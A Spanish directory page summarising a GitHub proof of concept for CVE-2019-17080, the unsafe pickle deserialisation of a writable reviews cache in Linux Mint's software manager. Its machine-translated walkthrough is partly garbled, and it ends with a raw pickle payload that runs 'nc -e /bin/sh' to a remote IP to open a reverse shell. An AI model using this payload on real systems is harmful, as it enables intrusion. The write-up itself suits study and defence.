Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Mintinstall-object-injection — CVE-2019-17080 | Kitploit
Herramientas/GitHubGitHub/materaj2/mintinstall-object-injection
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFAprendizaje y EducaciónExplotación de Binarios
GitHubmateraj2/mintinstall-object-injection

Mintinstall-object-injection

CVE-2019-17080

Ver Repositorio
2hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

[TR] El administrador de software de Linux Mint (v 7.9.5/9) provoca la inyección de objetos y la ejecución de código arbitrario debido a una configuración incorrecta.

[EN] El administrador de software de Linux Mint (v 7.9.5/9) nos hace ejecutar inyección de objetos y código arbitrario debido a una configuración incorrecta.

root@kitploit:~
mintinsall

[TR] Al ejecutar el administrador de software de Mint, comprueba si hay comentarios nuevos; si los hay, descarga new-reviews.list desde la dirección y lo escribe en el archivo.

[EN] Si hay un comentario nuevo, new-reviews.list descargar desde y escribir en el archivo.

root@kitploit:~
code mintinstall.py

[TR] Cuando el administrador de software se inicia por primera vez, llama a la clase ReviewCache() del módulo reviews.

[EN] Cuando el administrador de software se inicia por primera vez, llama a la clase ReviewCache() del módulo reviews.

¿Cómo Procesa los Datos?

¿Cómo Procesa los Datos?

root@kitploit:~
code reviews.py

[TR] Cuando la clase ReviewCache comienza (init), llama a la función _load_cache().

[EN] Cuando la clase ReviewCache se inicia (), llama a _load_cache().

Descargar herramienta
init

[TR] La función Load cache lee el archivo que está en la variable REVIEWS_CACHE y deserializa los datos del archivo con la ayuda del módulo pickle, guardando algunos valores en la memoria.

[EN] La función Load cache lee el archivo en la variable REVIEWS_CACHE, deserializa los datos del archivo con la ayuda del módulo pickle y conserva algunos valores en la memoria.

[TR] Cuando compruebo el archivo, parece que tengo permiso de escritura.

[EN] Cuando reviso el archivo, parece que tengo permiso de escritura.

[TR] Gracias al módulo Pickle, podemos realizar operaciones de serialización/deserialización; así, podemos incluir el módulo mediante el método reduce y ejecutar código arbitrario.

[EN] Pickle ya que podemos realizar operaciones de serialización/deserialización con el módulo, podemos incluir el módulo y ejecutar código arbitrario usando el método reduce.

[TR] En este caso, si se intenta deserializar el archivo, nuestro código malicioso se ejecutará.

[EN] Si intentas deserializar el archivo, nuestro código malicioso se ejecutará.

root@kitploit:~
cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi 
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.

alt-text